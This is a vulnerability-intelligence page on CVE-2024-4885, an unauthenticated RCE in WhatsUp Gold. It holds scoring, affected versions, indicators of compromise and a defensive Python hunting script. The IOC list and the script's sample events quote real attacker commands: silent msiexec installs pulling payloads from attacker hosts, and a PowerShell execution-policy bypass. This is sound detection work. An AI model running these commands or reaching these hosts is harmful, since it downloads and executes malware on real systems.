CVE-2024-4885
published 2024-06-25


Priority: P1 (score 100)
Severity: critical, CVSS 3.1 base score 9.8
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV, ITW (exploited in the wild), EXPLOIT, Initial access
CISA Known Exploited Vulnerability: remediation due 2025-03-24
Exploited in the wild
EPSS: 99.29% (99.9th percentile)
In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The WhatsUp.ExportUtilities.Export.GetFileWithoutZip allows execution of commands with iisapppool\nmconsole privileges.

Affected (2 ranges)

Vendor                         Product       Version range            Fixed in
progress                       whatsup_gold  < 23.1.3                 23.1.3
progress_software_corporation  whatsup_gold  >= 2023.1.0, < 2023.1.3  2023.1.3

Both rows describe the same fix release; the first uses the CPE version string 23.1.3, the second the product version 2023.1.3.

Detection & IOCs (extracted from sources)

url:      hxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837
ip:       45.227.255[.]216
url:      hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi
domain:   fedko[.]org
url:      hxxps://fedko[.]org/wp-includes/ID3/setup.msi
ip:       185.123.100[.]160
url:      hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe
path:     c:\programdata\a.ps1
path:     C:\programdata\ftpd32.exe
path:     c:\windows\temp\MSsetup.msi
port:     29742
process:  NmPoller.exe
command:  powershell -exec bypass -file c:\programdata\a.ps1
command:  msiexec /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
command:  msiexec /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
  • Use the following Trend Vision One / Endpoint Activity Data query to hunt for suspicious NmPoller.exe activity: "nmpoller.exe" AND eventSubId:(2 OR 101 OR 109 OR 901)
  • The vulnerable code path is WhatsUp.ExportUtilities.Export.GetFileWithoutZip, which is reachable without authentication and executes commands as iisapppool\nmconsole. In the WhatsUp Gold IIS logs, look for unauthenticated requests that reach this export functionality, and correlate them with child processes of the WhatsUp Gold service binaries.
  • Exploitation of CVE-2024-4885 in the wild was first observed December 6, 2024, with 8 unique malicious IPs observed through March 2, 2025, predominantly sourced from Hong Kong, Russia, and Brazil.
  • The IOCs above (URLs, IPs, dropped files) come from the August 2024 CVE-2024-6670/6671 exploitation campaigns, not from CVE-2024-4885 exploitation directly. The sources cite CVE-2024-4885 as a related WhatsUp Gold RCE (CVSS 9.8, fixed June 2024) that drew attacker attention, but the payload-level indicators belong to the 6670/6671 campaign. Treat them as indicators of the broader WhatsUp Gold attack ecosystem rather than as a signature for this CVE alone.
  • CVE-2024-4885 affects WhatsUp Gold versions released before 2023.1.3. Exploitation runs as iisapppool\nmconsole, not as SYSTEM, which matters when assessing what an attacker can do after initial access and how far lateral movement can go without a separate privilege escalation.
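An added hunting script, written for this page and not taken from it or from any vendor referenced above: it applies the process-chain indicators listed in the IOC section (NmPoller.exe as parent, a PowerShell execution-policy bypass, silent msiexec installs pulled from the listed hosts, the dropped-file paths) to Sysmon-style process-creation events. The event records, the host names and the NmPoller.exe install path are constructed for the example. The page gives no HTTP route for the GetFileWithoutZip code path, so the web-request side of the hunt is deliberately not modelled here.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1 style record (constructed for this example)."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Indicators copied from the page's IOC list (defanging removed so they match raw telemetry).
IOC_IPS = {"45.227.255.216", "185.123.100.160"}
IOC_DOMAINS = {"fedko.org"}
IOC_PATHS = {r"c:\programdata\a.ps1", r"c:\programdata\ftpd32.exe", r"c:\windows\temp\mssetup.msi"}

# WhatsUp Gold poller seen spawning the post-exploitation commands.
WUG_PARENTS = {"nmpoller.exe"}
# Living-off-the-land binaries used in the observed command lines.
SUSPECT_CHILDREN = {"powershell.exe", "msiexec.exe", "cmd.exe"}

# Captures the host part of an http(s) URL, stopping before any :port.
URL_RE = re.compile(r"https?://([^/\s:]+)(?::\d+)?", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of reasons an event looks like WhatsUp Gold post-exploitation (empty if none)."""
    reasons = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line.lower()

    if parent in WUG_PARENTS and child in SUSPECT_CHILDREN:
        reasons.append(f"{parent} spawned {child}")

    for m in URL_RE.finditer(ev.command_line):
        host = m.group(1).lower()
        if host in IOC_IPS or host in IOC_DOMAINS:
            reasons.append(f"known C2 host {host}")
        elif child == "msiexec.exe":
            # msiexec installing straight from a URL is rare in normal admin work.
            reasons.append(f"msiexec fetching remote MSI from {host}")

    for p in IOC_PATHS:
        if p in cmd:
            reasons.append(f"known dropped file {p}")

    if "-exec bypass" in cmd or "-ep bypass" in cmd:
        reasons.append("powershell execution-policy bypass")
    if "/qn" in cmd.split():
        reasons.append("silent msiexec install")
    return reasons


def hunt(events):
    """Return (host, command line, reasons) for every event that trips at least one rule."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev.host, ev.command_line, reasons))
    return hits


# Constructed sample telemetry. The install path is assumed, not taken from the page.
WUG = r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe"
SAMPLE_EVENTS = [
    ProcEvent("wug-srv01", WUG, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -exec bypass -file c:\programdata\a.ps1"),
    ProcEvent("wug-srv01", WUG, r"C:\Windows\System32\msiexec.exe",
              "msiexec /i https://fedko.org/wp-includes/ID3/setup.msi /Qn"),
    ProcEvent("ws-042", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Users\admin\Downloads\7z.msi"),          # benign local install
    ProcEvent("wug-srv01", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec /i http://45.227.255.216:29742/ddQCz2CkW8/setup.msi /Qn"),
]

if __name__ == "__main__":
    for host, cmd, why in hunt(SAMPLE_EVENTS):
        print(f"[{host}] {cmd}\n    " + "; ".join(why))
```

The rules are layered on purpose: the parent/child pairing alone catches a fresh campaign that has changed its infrastructure, the host and path matches alone catch the same payloads dropped through a different parent (the fourth event), and the `/Qn` and `-exec bypass` checks flag the tradecraft even when both the parent and the infrastructure are new. Point `SAMPLE_EVENTS` at your real Sysmon or EDR export and raise the priority of any hit on a WhatsUp Gold host.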

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck           9.8    CRITICAL
cisa                9.8    CRITICAL